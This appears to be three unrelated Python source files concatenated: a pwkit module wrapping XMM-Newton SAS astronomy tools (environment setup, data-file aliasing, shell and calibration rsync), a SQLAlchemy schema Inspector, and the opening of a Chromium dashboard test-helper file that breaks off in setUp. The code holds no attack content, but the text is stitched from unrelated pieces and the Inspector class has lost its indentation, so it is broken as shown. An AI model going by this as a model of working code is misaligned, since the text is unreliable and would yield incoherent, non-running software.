"""sas - running software in the SAS environment
To use, export an environment variable $PWKIT_SAS pointing to the SAS
installation root. The files $PWKIT_SAS/RELEASE and $PWKIT_SAS/setsas.sh
should exist. The "current calibration files" (CCF) should be accessible as
$PWKIT_SAS/ccf/; a symlink may make sense if multiple SAS versions are going
to be used.
SAS is unusual because you need to set up some magic environment variables
specific to the dataset that you're working with. There is also default
preparation to be run on each dataset before anything useful can be done.
Unpacking data sets
==========================
Data sets are downloaded as tar.gz files. Those unpack to a few files in '.'
including a .TAR file, which should be unpacked too. That unpacks to a bunch
of data files in '.' as well.
SAS installation notes
==========================
Download tarball from, e.g.,
ftp://legacy.gsfc.nasa.gov/xmm/software/sas/14.0.0/64/Linux/Fedora20/
Tarball unpacks installation script and data into '.', and the installation
script sets up a SAS install in a versioned subdirectory of '.', so curl|tar
should be run from something like /a/sas::
$ ./install.sh
The CCF are like CALDB and need to be rsynced -- see the update-ccf
subcommand.
ODF data format notes
=========================
ODF files all have names in the format RRRR_NNNNNNNNNN_IIUEEECCMMM.ZZZ where:
RRRR
revolution (orbit) number
NNNNNNNNNN
obs ID
II
The instrument:
OM
optical monitor
R1
RGS (reflection grating spectrometer) unit 1
R2
RGS 2
M1
EPIC (imaging camera) MOS 1 detector
M2
EPIC (imaging camera) MOS 2 detector
PN
EPIC (imaging camera) PN detector
RM
EPIC radiation monitor
SC
spacecraft
U
Scheduling status of exposure:
S
scheduled
U
unscheduled
X
N/A
EEE
exposure number
CC
CCD/OM-window ID
MMM
data type of file (many; not listed here)
ZZZ
file extension
See the ``make-*-aliases`` commands for tools that generate symlinks with saner
names.
"""
from __future__ import absolute_import, division, print_function
__all__ = ''.split()
import io, os.path, six
from ... import PKError, cli
from ...cli import multitool
from ...io import Path
from .. import Environment, prepend_environ_path, user_data_path
class SasEnvironment(Environment):
    """Environment for running XMM-Newton SAS tools against one ODF data set.

    The data set is identified by the path to its MANIFEST file; the
    revolution number and obsid are inferred from the files next to it.
    """

    _odfdir = None      # Path: directory containing the ODF files
    _revnum = None      # str: revolution (orbit) number
    _obsid = None       # str: observation ID
    _sumsas = None      # Path: the *SUM.SAS summary file
    _installdir = None  # str: root of the SAS installation
    _heaenv = None      # HEAsoft environment SAS layers on top of

    def __init__(self, manifest, installdir=None, heaenv=None):
        if installdir is None:
            installdir = self._default_installdir()
        if heaenv is None:
            from .. import heasoft
            heaenv = heasoft.HeasoftEnvironment()

        self._installdir = os.path.abspath(installdir)
        self._heaenv = heaenv

        # TODO: I used to read the manifest file to infer both the revolution
        # number and obsid, but in the case of 0673000145, the obsid mentioned
        # in the manifest is different! (But close: 0673000101.) So now I glob
        # the containing directory for that.

        manifest = Path(manifest)

        # Revolution number comes from the first plausible 'File ' entry.
        for line in manifest.read_lines():
            if not line.startswith('File '):
                continue

            bits = line.split()[1].split('_')
            if len(bits) < 3:
                continue

            self._revnum = bits[0]  # note: kept as a string; not an int
            break

        self._odfdir = Path(manifest).resolve().parent

        # Obsid comes from any data file matching the revolution number.
        for p in self._odfdir.glob('%s_*_*.FIT' % self._revnum):
            bits = p.name.split('_')
            self._obsid = bits[1]
            break

        self._sumsas = self._odfdir / ('%s_%s_SCX00000SUM.SAS' % (self._revnum, self._obsid))

    def _default_installdir(self):
        """Return $PWKIT_SAS, raising PKError if it is unset."""
        d = os.environ.get('PWKIT_SAS')
        if d is None:
            raise PKError('SAS installation directory must be specified '
                          'in the $PWKIT_SAS environment variable')
        return d

    def modify_environment(self, env):
        """Fill `env` with the variables SAS tools need; returns `env`."""
        self._heaenv.modify_environment(env)

        def path(*args):
            return os.path.join(self._installdir, *args)

        env['SAS_DIR'] = path()
        env['SAS_PATH'] = env['SAS_DIR']
        env['SAS_CCFPATH'] = path('ccf')
        env['SAS_ODF'] = str(self._sumsas)  # but see _preexec
        env['SAS_CCF'] = str(self._odfdir / 'ccf.cif')

        prepend_environ_path(env, 'PATH', path('bin'))
        prepend_environ_path(env, 'LD_LIBRARY_PATH', path('libextra'))
        prepend_environ_path(env, 'LD_LIBRARY_PATH', path('lib'))
        prepend_environ_path(env, 'PERL5LIB', path('lib', 'perl5'))

        env['SAS_BROWSER'] = 'firefox'  # yay hardcoding
        env['SAS_IMAGEVIEWER'] = 'ds9'
        env['SAS_SUPPRESS_WARNING'] = '1'
        env['SAS_VERBOSITY'] = '4'

        # These can be helpful:
        env['PWKIT_SAS_REVNUM'] = self._revnum
        env['PWKIT_SAS_OBSID'] = self._obsid

        return env

    def _preexec(self, env, printbuilds=True):
        """Lazily build the CIF and SUM.SAS files before first use.

        Both build steps run with SAS_ODF pointing at the ODF directory
        and restore it to the SUM.SAS path afterwards.
        """
        from ...cli import wrapout

        # Need to compile the CCF info?
        cif = env['SAS_CCF']
        if not os.path.exists(cif):
            if printbuilds:
                print('[building %s]' % cif)

            env['SAS_ODF'] = str(self._odfdir)
            log = self._odfdir / 'cifbuild.log'

            with log.open('wb') as f:
                w = wrapout.Wrapper(f)
                w.use_colors = True
                if w.launch('cifbuild', ['cifbuild'], env=env, cwd=str(self._odfdir)):
                    raise PKError('failed to build CIF; see %s', log)

            if not os.path.exists(cif):
                # cifbuild can exit with status 0 whilst still having failed
                raise PKError('failed to build CIF; see %s', log)

            env['SAS_ODF'] = str(self._sumsas)

        # Need to generate SUM.SAS file?
        if not self._sumsas.exists():
            if printbuilds:
                print('[building %s]' % self._sumsas)

            env['SAS_ODF'] = str(self._odfdir)
            log = self._odfdir / 'odfingest.log'

            with log.open('wb') as f:
                w = wrapout.Wrapper(f)
                w.use_colors = True
                if w.launch('odfingest', ['odfingest'], env=env, cwd=str(self._odfdir)):
                    # Bug fix: message previously said "failed to build
                    # CIF", copy-pasted from the cifbuild branch above.
                    raise PKError('failed to ingest ODF; see %s', log)

            env['SAS_ODF'] = str(self._sumsas)
# Command-line interface
class Exec(multitool.Command):
    name = 'exec'
    argspec = '<manifest> <command> [args...]'
    summary = 'Run a program in SAS.'
    more_help = '''Due to the way SAS works, the path to a MANIFEST.nnnnn file in an ODF
directory must be specified, and all operations work on the specified data
set.'''

    def invoke(self, args, **kwargs):
        """Replace this process with `command` inside the SAS environment."""
        if len(args) < 2:
            raise multitool.UsageError('exec requires at least 2 arguments')

        # First argument locates the data set; the rest form the argv.
        environment = SasEnvironment(args[0])
        environment.execvpe(args[1:])
class MakeEPICAliases(multitool.Command):
    # Symlinks EPIC ODF files under human-readable names.
    name = 'make-epic-aliases'
    argspec = '<srcdir> <destdir>'
    summary = 'Generate user-friendly aliases to XMM-Newton EPIC data files.'
    more_help = '''destdir should already not exist and will be created. <srcdir> should
be the ODF directory, containing a file named MANIFEST.<numbers> and many others.'''

    # Character slices into the standard ODF file name
    # RRRR_NNNNNNNNNN_IIUEEECCMMM.ZZZ (see the module docstring).
    INSTRUMENT = slice(16, 18)
    EXPFLAG = slice(18, 19)  # 'S': sched, 'U': unsched; 'X': N/A
    EXPNO = slice(19, 22)
    CCDNO = slice(22, 24)
    DTYPE = slice(24, 27)
    EXTENSION = slice(28, None)

    # Two-letter instrument codes handled by this subcommand; OM, RGS
    # and SC files have their own subcommands.
    instrmap = {
        'M1': 'mos1',
        'M2': 'mos2',
        'PN': 'pn',
        'RM': 'radmon',
    }

    extmap = {
        'FIT': 'fits',
    }

    # Three-letter data-type codes -> descriptive names.
    dtypemap = {
        'aux': 'aux',
        'bue': 'burst',
        'ccx': 'counting_cycle',
        'cte': 'compressed_timing',
        'dii': 'diagnostic',
        'dli': 'discarded_lines',
        'ecx': 'hk_extraheating_config',  # or radiation mon count rate
        'esx': 'spectra',  # radiation monitor spectra, that is
        'hbh': 'hk_hbr_buffer',
        'hch': 'hk_hbr_config',
        'hdi': 'high_rate_offset_data',
        'hth': 'hk_hbr_threshold',
        'ime': 'imaging',
        'noi': 'noise',
        'odi': 'offset_data',
        'ove': 'offset_variance',
        'pah': 'hk_additional',
        'peh': 'hk_periodic',
        'pmh': 'hk_main',
        'pth': 'hk_bright_pixels',
        'rie': 'reduced_imaging',
        'tmh': 'hk_thermal_limits',
        'tie': 'timing',
    }

    def invoke(self, args, **kwargs):
        """Create `destdir` and populate it with relative symlinks."""
        if len(args) != 2:
            raise multitool.UsageError('make-epic-aliases requires exactly 2 arguments')

        srcdir = Path(args[0])
        destdir = Path(args[1])
        # Names shorter than 29 chars cannot be standard ODF data files.
        srcpaths = [x for x in srcdir.iterdir() if len(x.name) > 28]

        # Sorted list of exposure numbers.
        expnos = dict((i, set()) for i in six.iterkeys(self.instrmap))

        for p in srcpaths:
            instr = p.name[self.INSTRUMENT]
            if instr not in self.instrmap:
                continue

            expno = int(p.name[self.EXPNO])
            dtype = p.name[self.DTYPE]
            if expno > 0 and dtype not in ('DLI', 'ODI'):
                expnos[instr].add(expno)

        # Per instrument: raw exposure number -> compact 0-based index.
        expseqs = {}
        for k, v in six.iteritems(expnos):
            expseqs[self.instrmap[k]] = dict((n, i) for i, n in enumerate(sorted(v)))

        # Do it.
        stems = set()
        destdir.mkdir()  # intentionally crash if exists; easiest approach

        for p in srcpaths:
            instr = p.name[self.INSTRUMENT]
            if instr not in self.instrmap:
                continue

            # Unpack every field; not all are used below.
            eflag = p.name[self.EXPFLAG]
            expno = p.name[self.EXPNO]
            ccdno = p.name[self.CCDNO]
            dtype = p.name[self.DTYPE]
            ext = p.name[self.EXTENSION]

            instr = self.instrmap[instr]
            expno = int(expno)
            dtype = self.dtypemap[dtype.lower()]
            ext = self.extmap[ext]

            if expno > 0 and dtype not in ('discarded_lines', 'offset_data'):
                expno = expseqs[instr][expno]

            if instr == 'radmon' and dtype == 'hk_extraheating_config':
                dtype = 'rates'

            # Choose a short stem; which fields appear depends on what is
            # meaningful for this file type.
            if instr == 'radmon' or dtype == 'aux':
                stem = '%s_e%03d_%s.%s' % (instr, expno, dtype, ext)
            elif ccdno == '00':
                stem = '%s_%s.%s' % (instr, dtype, ext)
            elif dtype in ('discarded_lines', 'offset_data'):
                stem = '%s_%s_e%03d_c%s.%s' % (instr, dtype, expno, ccdno, ext)
            else:
                stem = '%s_e%03d_c%s_%s.%s' % (instr, expno, ccdno, dtype, ext)

            if stem in stems:
                cli.die('short identifier clash: %r', stem)
            stems.add(stem)
            (destdir / stem).rellink_to(p)
class MakeOMAliases(multitool.Command):
    # Symlinks optical-monitor (OM) products under friendly names.
    name = 'make-om-aliases'
    argspec = '<srcdir> <destdir>'
    summary = 'Generate user-friendly aliases to XMM-Newton OM data files.'
    more_help = 'destdir should already not exist and will be created.'

    # Character slices into the OM product file name.
    PROD_TYPE = slice(0, 1)  # 'P': final product; 'F': intermediate
    OBSID = slice(1, 11)
    EXPFLAG = slice(11, 12)  # 'S': sched, 'U': unsched; 'X': N/A
    EXPNO = slice(14, 17)  # (12-14 is the string 'OM')
    DTYPE = slice(17, 23)
    WINNUM = slice(23, 24)
    SRCNUM = slice(24, 27)
    EXTENSION = slice(28, None)

    extmap = {
        'ASC': 'txt',
        'FIT': 'fits',
        'PDF': 'pdf',
        'PS': 'ps',
    }

    dtypemap = {
        'image_': 'image_ccd',
        'simage': 'image_sky',
        'swsrli': 'source_list',
        'timesr': 'lightcurve',
        'tshplt': 'tracking_plot',
        'tstrts': 'tracking_stars',
    }

    def invoke(self, args, **kwargs):
        """Create `destdir` full of friendly symlinks to OM products."""
        if len(args) != 2:
            raise multitool.UsageError('make-om-aliases requires exactly 2 arguments')

        from fnmatch import fnmatch
        srcdir, destdir = args
        # Only final products ('P') with full-length standard names.
        srcfiles = [x for x in os.listdir(srcdir)
                    if x[0] == 'P' and len(x) > 28]

        # Sorted list of exposure numbers.
        expnos = set()

        for f in srcfiles:
            if not fnmatch(f, 'P*IMAGE_*.FIT'):
                continue
            expnos.add(f[self.EXPNO])

        # Raw exposure number -> compact 0-based sequence index.
        expseqs = dict((n, i) for i, n in enumerate(sorted(expnos)))

        # Do it.
        idents = set()
        os.mkdir(destdir)  # intentionally crash if exists; easiest approach

        for f in srcfiles:
            # Unpack every field; not all are used below.
            ptype = f[self.PROD_TYPE]
            obsid = f[self.OBSID]
            eflag = f[self.EXPFLAG]
            expno = f[self.EXPNO]
            dtype = f[self.DTYPE]
            winnum = f[self.WINNUM]
            srcnum = f[self.SRCNUM]
            ext = f[self.EXTENSION]

            seq = expseqs[expno]
            dtype = self.dtypemap[dtype.lower()]
            ext = self.extmap[ext]

            # There's only one clash, and it's easy:
            if dtype == 'lightcurve' and ext == 'pdf':
                continue

            ident = (seq, dtype)
            if ident in idents:
                cli.die('short identifier clash: %r', ident)
            idents.add(ident)

            oldpath = os.path.join(srcdir, f)
            newpath = os.path.join(destdir, '%s.%02d.%s' % (dtype, seq, ext))
            os.symlink(os.path.relpath(oldpath, destdir), newpath)
class MakeRGSAliases(multitool.Command):
    # Symlinks RGS (reflection grating spectrometer) ODF files under
    # friendly names.
    name = 'make-rgs-aliases'
    argspec = '<srcdir> <destdir>'
    summary = 'Generate user-friendly aliases to XMM-Newton RGS data files.'
    more_help = '''destdir should already not exist and will be created. <srcdir> should
be the ODF directory, containing a file named MANIFEST.<numbers> and many others.'''

    # Character slices into the standard ODF file name.
    INSTRUMENT = slice(16, 18)
    EXPFLAG = slice(18, 19)  # 'S': sched, 'U': unsched; 'X': N/A
    EXPNO = slice(19, 22)
    CCDNO = slice(22, 24)
    DTYPE = slice(24, 27)
    EXTENSION = slice(28, None)

    instrmap = {
        'R1': 'rgs1',
        'R2': 'rgs2',
    }

    extmap = {
        'FIT': 'fits',
    }

    dtypemap = {
        'aux': 'aux',
        'd1h': 'hk_dpp1',
        'd2h': 'hk_dpp2',
        'dii': 'diagnostic',
        'hte': 'high_time_res',
        'ofx': 'offset',
        'pch': 'hk_ccd_temp',
        'pfh': 'hk_periodic',
        'spe': 'spectra',
    }

    def invoke(self, args, **kwargs):
        """Create `destdir` and populate it with relative symlinks."""
        if len(args) != 2:
            raise multitool.UsageError('make-rgs-aliases requires exactly 2 arguments')

        srcdir = Path(args[0])
        destdir = Path(args[1])
        # Names shorter than 29 chars cannot be standard ODF data files.
        srcpaths = [x for x in srcdir.iterdir() if len(x.name) > 28]

        # Sorted list of exposure numbers.
        expnos = dict((i, set()) for i in six.iterkeys(self.instrmap))

        for p in srcpaths:
            instr = p.name[self.INSTRUMENT]
            if instr not in self.instrmap:
                continue

            expno = int(p.name[self.EXPNO])
            if expno > 0 and expno < 900:
                expnos[instr].add(expno)

        # Per instrument: raw exposure number -> compact 0-based index.
        expseqs = {}
        for k, v in six.iteritems(expnos):
            expseqs[self.instrmap[k]] = dict((n, i) for i, n in enumerate(sorted(v)))

        # Do it.
        stems = set()
        destdir.mkdir()  # intentionally crash if exists; easiest approach

        for p in srcpaths:
            instr = p.name[self.INSTRUMENT]
            if instr not in self.instrmap:
                continue

            # Unpack every field; not all are used below.
            eflag = p.name[self.EXPFLAG]
            expno = p.name[self.EXPNO]
            ccdno = p.name[self.CCDNO]
            dtype = p.name[self.DTYPE]
            ext = p.name[self.EXTENSION]

            instr = self.instrmap[instr]
            expno = int(expno)
            dtype = self.dtypemap[dtype.lower()]
            ext = self.extmap[ext]

            if expno > 0 and expno < 900:
                expno = expseqs[instr][expno]

            # Choose a short stem depending on which fields matter.
            if ccdno == '00' and dtype != 'aux':
                stem = '%s_%s.%s' % (instr, dtype, ext)
            elif dtype == 'aux':
                stem = '%s_e%03d_%s.%s' % (instr, expno, dtype, ext)
            elif dtype == 'diagnostic':
                stem = '%s_%s_e%03d_c%s.%s' % (instr, dtype, expno, ccdno, ext)
            else:
                stem = '%s_e%03d_c%s_%s.%s' % (instr, expno, ccdno, dtype, ext)

            if stem in stems:
                cli.die('short identifier clash: %r', stem)
            stems.add(stem)
            (destdir / stem).rellink_to(p)
class MakeSCAliases(multitool.Command):
    # Symlinks spacecraft (SC) ODF files under friendly names.
    name = 'make-sc-aliases'
    argspec = '<srcdir> <destdir>'
    summary = 'Generate user-friendly aliases to XMM-Newton spacecraft (SC) data files.'
    more_help = '''destdir should already not exist and will be created. <srcdir> should
be the ODF directory, containing a file named MANIFEST.<numbers> and many others.'''

    # Character slices into the standard ODF file name.
    INSTRUMENT = slice(16, 18)
    EXPFLAG = slice(18, 19)  # 'S': sched, 'U': unsched; 'X': N/A
    EXPNO = slice(19, 22)
    CCDNO = slice(22, 24)
    DTYPE = slice(24, 27)
    EXTENSION = slice(28, None)

    extmap = {
        'ASC': 'txt',
        'FIT': 'fits',
        'SAS': 'txt',
    }

    dtypemap = {
        'ats': 'attitude',
        'das': 'dummy_attitude',
        'pos': 'pred_orbit',
        'p1s': 'phk_hk1',
        'p2s': 'phk_hk2',
        'p3s': 'phk_att1',
        'p4s': 'phk_att2',
        'p5s': 'phk_sid0',
        'p6s': 'phk_sid1',
        'p7s': 'phk_sid4',
        'p8s': 'phk_sid5',
        'p9s': 'phk_sid6',
        'ras': 'raw_attitude',
        'ros': 'recon_orbit',
        'sum': 'summary',
        'tcs': 'raw_time_corr',
        'tcx': 'recon_time_corr',
    }

    def invoke(self, args, **kwargs):
        """Create `destdir` and populate it with relative symlinks."""
        if len(args) != 2:
            raise multitool.UsageError('make-sc-aliases requires exactly 2 arguments')

        srcdir = Path(args[0])
        destdir = Path(args[1])
        # Names shorter than 29 chars cannot be standard ODF data files.
        srcfiles = [x for x in srcdir.iterdir() if len(x.name) > 28]

        # Do it.
        idents = set()
        destdir.mkdir()  # intentionally crash if exists; easiest approach

        for p in srcfiles:
            instr = p.name[self.INSTRUMENT]
            if instr != 'SC':
                continue

            # none of these are actually useful for SC files:
            #eflag = p.name[self.EXPFLAG]
            #expno = p.name[self.EXPNO]
            #ccdno = p.name[self.CCDNO]
            dtype = p.name[self.DTYPE]
            ext = p.name[self.EXTENSION]

            # One conflict, easy to resolve
            if dtype == 'SUM' and ext == 'ASC':
                continue

            dtype = self.dtypemap[dtype.lower()]
            ext = self.extmap[ext]

            ident = dtype
            if ident in idents:
                cli.die('short identifier clash: %r', ident)
            idents.add(ident)

            (destdir / (dtype + '.' + ext)).rellink_to(p)
class Shell(multitool.Command):
    # XXX we hardcode bash! and we copy/paste from environments/__init__.py
    name = 'shell'
    argspec = '<manifest>'
    summary = 'Start an interactive shell in the SAS environment.'
    help_if_no_args = False
    more_help = '''Due to the way SAS works, the path to a MANIFEST.nnnnn file in an ODF
directory must be specified, and all operations work on the specified data
set.'''

    def invoke(self, args, **kwargs):
        """Launch an interactive bash with a branded prompt.

        A temporary rcfile sources the user's ~/.bashrc, prefixes the
        prompt with the obsid, and deletes itself ('rm %s') once bash
        has sourced it.
        """
        if len(args) != 1:
            raise multitool.UsageError('shell expects exactly 1 argument')

        env = SasEnvironment(args[0])

        from tempfile import NamedTemporaryFile
        with NamedTemporaryFile(delete=False, mode='wt') as f:
            print('''[ -e ~/.bashrc ] && source ~/.bashrc
PS1="SAS(%s) $PS1"
rm %s''' % (env._obsid, f.name), file=f)

        env.execvpe(['bash', '--rcfile', f.name, '-i'])
class UpdateCcf(multitool.Command):
    name = 'update-ccf'
    argspec = ''
    summary = 'Update the SAS "current calibration files".'
    more_help = 'This executes an rsync command to make sure the files are up-to-date.'
    help_if_no_args = False

    def invoke(self, args, **kwargs):
        """Mirror the remote CCF tree into $PWKIT_SAS/ccf via rsync."""
        # This subcommand accepts no positional arguments.
        if len(args):
            raise multitool.UsageError('update-ccf expects no arguments')

        sasdir = os.environ.get('PWKIT_SAS')
        if sasdir is None:
            cli.die('environment variable $PWKIT_SAS must be set')

        # Replace the current process with rsync, running inside the
        # CCF directory so '.' is the sync destination.
        os.chdir(os.path.join(sasdir, 'ccf'))
        rsync_argv = ['rsync',
                      '-av',
                      '--delete',
                      '--delete-after',
                      '--force',
                      '--include=*.CCF',
                      '--exclude=*/',
                      'xmm.esac.esa.int::XMM_VALID_CCF',
                      '.']
        os.execvp('rsync', rsync_argv)
class SasTool(multitool.Multitool):
    # Driver/registry for the subcommands defined in this module.
    cli_name = 'pkenvtool sas'
    summary = 'Run tools in the SAS environment.'
def commandline(argv):
    """Entry point for ``pkenvtool sas``: dispatch to a subcommand."""
    from six import itervalues

    driver = SasTool()
    # Register every command class defined at this module's top level.
    driver.populate(itervalues(globals()))
    driver.commandline(argv)
| |
"""Provides an abstraction for obtaining database schema information.
Usage Notes:
Here are some general conventions when accessing the low level inspector
methods such as get_table_names, get_columns, etc.
1. Inspector methods return lists of dicts in most cases for the following
reasons:
* They're both standard types that can be serialized.
* Using a dict instead of a tuple allows easy expansion of attributes.
* Using a list for the outer structure maintains order and is easy to work
with (e.g. list comprehension [d['name'] for d in cols]).
2. Records that contain a name, such as the column name in a column record
use the key 'name'. So for most return values, each record will have a
'name' attribute..
"""
import sqlalchemy
from sqlalchemy import exc, sql
from sqlalchemy import util
from sqlalchemy.types import TypeEngine
from sqlalchemy import schema as sa_schema
@util.decorator
def cache(fn, self, con, *args, **kw):
    # Memoize a dialect reflection call in the caller-supplied
    # ``info_cache`` dict; without one, always hit the dialect.
    # (Py2 module: basestring/iteritems are intentional.)
    cache_dict = kw.get('info_cache', None)
    if cache_dict is None:
        return fn(self, con, *args, **kw)

    # Key on the function plus its hashable string/scalar arguments.
    str_args = tuple(a for a in args if isinstance(a, basestring))
    scalar_kw = tuple((k, v) for k, v in kw.iteritems()
                      if isinstance(v, (basestring, int, float)))
    key = (fn.__name__, str_args, scalar_kw)

    result = cache_dict.get(key)
    if result is None:
        result = fn(self, con, *args, **kw)
        cache_dict[key] = result
    return result
class Inspector(object):
"""Performs database schema inspection.
The Inspector acts as a proxy to the dialects' reflection methods and
provides higher level functions for accessing database schema information.
"""
def __init__(self, conn):
    """Initialize the instance.

    :param conn: a :class:`~sqlalchemy.engine.base.Connectable`
    """
    self.conn = conn
    # set the engine: a Connection exposes it via .engine, while an
    # Engine passed directly is its own engine.
    self.engine = conn.engine if hasattr(conn, 'engine') else conn
    self.dialect = self.engine.dialect
    self.info_cache = {}
@classmethod
def from_engine(cls, engine):
if hasattr(engine.dialect, 'inspector'):
return engine.dialect.inspector(engine)
return Inspector(engine)
@property
def default_schema_name(self):
    # Schema used when none is specified, as reported by the dialect.
    return self.dialect.default_schema_name
def get_schema_names(self):
"""Return all schema names.
"""
if hasattr(self.dialect, 'get_schema_names'):
return self.dialect.get_schema_names(self.conn,
info_cache=self.info_cache)
return []
def get_table_names(self, schema=None, order_by=None):
"""Return all table names in `schema`.
:param schema: Optional, retrieve names from a non-default schema.
:param order_by: Optional, may be the string "foreign_key" to sort
the result on foreign key dependencies.
This should probably not return view names or maybe it should return
them with an indicator t or v.
"""
if hasattr(self.dialect, 'get_table_names'):
tnames = self.dialect.get_table_names(self.conn,
schema,
info_cache=self.info_cache)
else:
tnames = self.engine.table_names(schema)
if order_by == 'foreign_key':
ordered_tnames = tnames[:]
# Order based on foreign key dependencies.
for tname in tnames:
table_pos = tnames.index(tname)
fkeys = self.get_foreign_keys(tname, schema)
for fkey in fkeys:
rtable = fkey['referred_table']
if rtable in ordered_tnames:
ref_pos = ordered_tnames.index(rtable)
# Make sure it's lower in the list than anything it
# references.
if table_pos > ref_pos:
ordered_tnames.pop(table_pos) # rtable moves up 1
# insert just below rtable
ordered_tnames.index(ref_pos, tname)
tnames = ordered_tnames
return tnames
def get_table_options(self, table_name, schema=None, **kw):
if hasattr(self.dialect, 'get_table_options'):
return self.dialect.get_table_options(self.conn, table_name, schema,
info_cache=self.info_cache,
**kw)
return {}
def get_view_names(self, schema=None):
"""Return all view names in `schema`.
:param schema: Optional, retrieve names from a non-default schema.
"""
return self.dialect.get_view_names(self.conn, schema,
info_cache=self.info_cache)
def get_view_definition(self, view_name, schema=None):
"""Return definition for `view_name`.
:param schema: Optional, retrieve names from a non-default schema.
"""
return self.dialect.get_view_definition(
self.conn, view_name, schema, info_cache=self.info_cache)
def get_columns(self, table_name, schema=None, **kw):
"""Return information about columns in `table_name`.
Given a string `table_name` and an optional string `schema`, return
column information as a list of dicts with these keys:
name
the column's name
type
:class:`~sqlalchemy.types.TypeEngine`
nullable
boolean
default
the column's default value
attrs
dict containing optional column attributes
"""
col_defs = self.dialect.get_columns(self.conn, table_name, schema,
info_cache=self.info_cache,
**kw)
for col_def in col_defs:
# make this easy and only return instances for coltype
coltype = col_def['type']
if not isinstance(coltype, TypeEngine):
col_def['type'] = coltype()
return col_defs
def get_primary_keys(self, table_name, schema=None, **kw):
"""Return information about primary keys in `table_name`.
Given a string `table_name`, and an optional string `schema`, return
primary key information as a list of column names.
"""
pkeys = self.dialect.get_primary_keys(self.conn, table_name, schema,
info_cache=self.info_cache,
**kw)
return pkeys
def get_foreign_keys(self, table_name, schema=None, **kw):
"""Return information about foreign_keys in `table_name`.
Given a string `table_name`, and an optional string `schema`, return
foreign key information as a list of dicts with these keys:
constrained_columns
a list of column names that make up the foreign key
referred_schema
the name of the referred schema
referred_table
the name of the referred table
referred_columns
a list of column names in the referred table that correspond to
constrained_columns
\**kw
other options passed to the dialect's get_foreign_keys() method.
"""
fk_defs = self.dialect.get_foreign_keys(self.conn, table_name, schema,
info_cache=self.info_cache,
**kw)
return fk_defs
def get_indexes(self, table_name, schema=None, **kw):
"""Return information about indexes in `table_name`.
Given a string `table_name` and an optional string `schema`, return
index information as a list of dicts with these keys:
name
the index's name
column_names
list of column names in order
unique
boolean
\**kw
other options passed to the dialect's get_indexes() method.
"""
indexes = self.dialect.get_indexes(self.conn, table_name,
schema,
info_cache=self.info_cache, **kw)
return indexes
def reflecttable(self, table, include_columns):
dialect = self.conn.dialect
# MySQL dialect does this. Applicable with other dialects?
if hasattr(dialect, '_connection_charset') \
and hasattr(dialect, '_adjust_casing'):
charset = dialect._connection_charset
dialect._adjust_casing(table)
# table attributes we might need.
reflection_options = dict(
(k, table.kwargs.get(k)) for k in dialect.reflection_options if k in table.kwargs)
schema = table.schema
table_name = table.name
# apply table options
tbl_opts = self.get_table_options(table_name, schema, **table.kwargs)
if tbl_opts:
table.kwargs.update(tbl_opts)
# table.kwargs will need to be passed to each reflection method. Make
# sure keywords are strings.
tblkw = table.kwargs.copy()
for (k, v) in tblkw.items():
del tblkw[k]
tblkw[str(k)] = v
# Py2K
if isinstance(schema, str):
schema = schema.decode(dialect.encoding)
if isinstance(table_name, str):
table_name = table_name.decode(dialect.encoding)
# end Py2K
# columns
found_table = False
for col_d in self.get_columns(table_name, schema, **tblkw):
found_table = True
name = col_d['name']
if include_columns and name not in include_columns:
continue
coltype = col_d['type']
col_kw = {
'nullable':col_d['nullable'],
}
if 'autoincrement' in col_d:
col_kw['autoincrement'] = col_d['autoincrement']
if 'quote' in col_d:
col_kw['quote'] = col_d['quote']
colargs = []
if col_d.get('default') is not None:
# the "default" value is assumed to be a literal SQL expression,
# so is wrapped in text() so that no quoting occurs on re-issuance.
colargs.append(sa_schema.DefaultClause(sql.text(col_d['default'])))
if 'sequence' in col_d:
# TODO: mssql, maxdb and sybase are using this.
seq = col_d['sequence']
sequence = sa_schema.Sequence(seq['name'], 1, 1)
if 'start' in seq:
sequence.start = seq['start']
if 'increment' in seq:
sequence.increment = seq['increment']
colargs.append(sequence)
col = sa_schema.Column(name, coltype, *colargs, **col_kw)
table.append_column(col)
if not found_table:
raise exc.NoSuchTableError(table.name)
# Primary keys
primary_key_constraint = sa_schema.PrimaryKeyConstraint(*[
table.c[pk] for pk in self.get_primary_keys(table_name, schema, **tblkw)
if pk in table.c
])
table.append_constraint(primary_key_constraint)
# Foreign keys
fkeys = self.get_foreign_keys(table_name, schema, **tblkw)
for fkey_d in fkeys:
conname = fkey_d['name']
constrained_columns = fkey_d['constrained_columns']
referred_schema = fkey_d['referred_schema']
referred_table = fkey_d['referred_table']
referred_columns = fkey_d['referred_columns']
refspec = []
if referred_schema is not None:
sa_schema.Table(referred_table, table.metadata,
autoload=True, schema=referred_schema,
autoload_with=self.conn,
**reflection_options
)
for column in referred_columns:
refspec.append(".".join(
[referred_schema, referred_table, column]))
else:
sa_schema.Table(referred_table, table.metadata, autoload=True,
autoload_with=self.conn,
**reflection_options
)
for column in referred_columns:
refspec.append(".".join([referred_table, column]))
table.append_constraint(
sa_schema.ForeignKeyConstraint(constrained_columns, refspec,
conname, link_to_name=True))
# Indexes
indexes = self.get_indexes(table_name, schema)
for index_d in indexes:
name = index_d['name']
columns = index_d['column_names']
unique = index_d['unique']
flavor = index_d.get('type', 'unknown type')
if include_columns and \
not set(columns).issubset(include_columns):
util.warn(
"Omitting %s KEY for (%s), key covers omitted columns." %
(flavor, ', '.join(columns)))
continue
sa_schema.Index(name, *[table.columns[c] for c in columns],
**dict(unique=unique))
| |
# Copyright 2015 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Helper functions used in multiple unit tests."""
import base64
import json
import mock
import os
import re
import unittest
import urllib
from google.appengine.api import users
from google.appengine.ext import deferred
from google.appengine.ext import ndb
from google.appengine.ext import testbed
from dashboard.common import stored_object
from dashboard.common import utils
from dashboard.models import graph_data
from dashboard.services import rietveld_service
_QUEUE_YAML_DIR = os.path.join(os.path.dirname(__file__), '..', '..')
class FakeRequestObject(object):
  """Minimal stand-in for a request object, usable by datastore_hooks mocks."""

  def __init__(self, remote_addr=None):
    # Only the attributes that datastore_hooks reads are provided.
    self.remote_addr = remote_addr
    self.registry = {}
class FakeResponseObject(object):
  """Minimal stand-in for a urlfetch response, usable by urlfetch mocks."""

  def __init__(self, status_code, content):
    # Mirror the two attributes callers read off a urlfetch response.
    self.content = content
    self.status_code = status_code
class TestCase(unittest.TestCase):
  """Common base class for test cases."""

  def setUp(self):
    # Activate an App Engine testbed and initialize every service stub the
    # dashboard tests rely on (datastore, mail, memcache, taskqueue, users,
    # urlfetch).
    self.testbed = testbed.Testbed()
    self.testbed.activate()
